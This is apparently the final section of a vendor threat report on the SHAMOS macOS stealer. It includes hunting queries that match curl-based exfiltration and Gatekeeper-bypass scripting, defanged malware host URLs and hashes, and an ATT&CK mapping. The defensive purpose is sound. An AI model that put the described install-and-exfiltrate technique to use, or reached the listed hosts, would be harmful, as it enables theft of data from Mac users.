Assessment
Table of Contents
This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors. Promoting false malicious websites encourages more site traffic, which will lead to more potential victims. The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim’s machine while bypassing Gatekeeper checks.
CrowdStrike Counter Adversary Operations assesses that eCrime actors will likely continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers. This assessment is made with high confidence, as the combination has historically been successful, and these methods allow actors to bypass Gatekeeper checks.
Recommended Prevention Settings
To protect endpoints from this threat, CrowdStrike Falcon® Insight XDR customers should ensure the following prevention policy settings are configured:
- Suspicious process prevention
- Intelligence-sourced threat prevention
Threat Hunting Queries
The following CrowdStrike Falcon® Next-Gen SIEM Advanced Event Search queries are provided to assist defenders in hunting for this and similar activity across their endpoints.
NOTE: Make sure to update the Falcon URL to the cloud in which your environment is currently configured (US1, US2, EU, etc.)
“Bash script execution with calls to risky LOOBINs”
event_platform=Mac #event_simpleName=ScriptControlScanInfo ScriptContent="*dscl*curl*xattr*chmod*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ScriptContent])
“AppleScript execution under a binary from /tmp/”
event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*/tmp/*"
| join({event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*osascript" CommandLine="*-e*" | rename(field="CommandLine", as="ChildCommandLine") | rename(field="ImageFileName", as="ChildImageFileName")}, field=TargetProcessId, key=ParentProcessId, include=["ChildImageFileName", "ChildCommandLine"], limit=20000)
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine, ChildImageFileName, ChildCommandLine])
“Curl with commandline indicative of data exfil”
event_platform=Mac #event_simpleName=ProcessRollup2 FileName=curl CommandLine="*POST*out.zip*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine])
Indicators of Compromise (IOCs)
| IOC | Description |
| Malvertising websites containing instructions to download SHAMOS |
mac-safer[.]com rescue-mac[.]com https[:]//github[.]com/jeryrymoore/Iterm2 |
| Bash script SHA256 hashes |
231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68 |
| SHAMOS Mach-O SHA256 hashes |
4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5 a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322 95b97a5da68fcb73c98cd9311c56747545db5260122ddf6fae7b152d3d802877 |
| Bash script host URLs |
https[:]//icloudservers[.]com/gm/install[.]sh https[:]//macostutorial[.]com/iterm2/install[.]sh |
| SHAMOS host URLs |
https[:]//icloudservers[.]com/gm/update https[:]//macostutorial[.]com/iterm2/update |
MITRE ATT&CK Framework
The following table maps reported COOKIE SPIDER and SHAMOS tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework.
| ID | Technique | Description |
| T1583.001 | Acquire Infrastructure: Domains | The eCrime actor registered fake macOS help websites |
| T1189 | Drive-by Compromise | Malvertising distributes websites containing SHAMOS installation instructions |
| T1204 | User Execution | SHAMOS requires the user to execute the malicious installer command |
| T1027.010 | Obfuscated Files or Information: Command Obfuscation | The malicious command uses Base64-encoding to obfuscate the Bash script download URL |
| T1105 | Ingress Tool Transfer | The malicious Bash script downloads SHAMOS from an external URL |
Additional Resources
1. The legitimate iTerm2 GitHub repository is located at https[:]//github[.]com/gnachman/iTerm2.
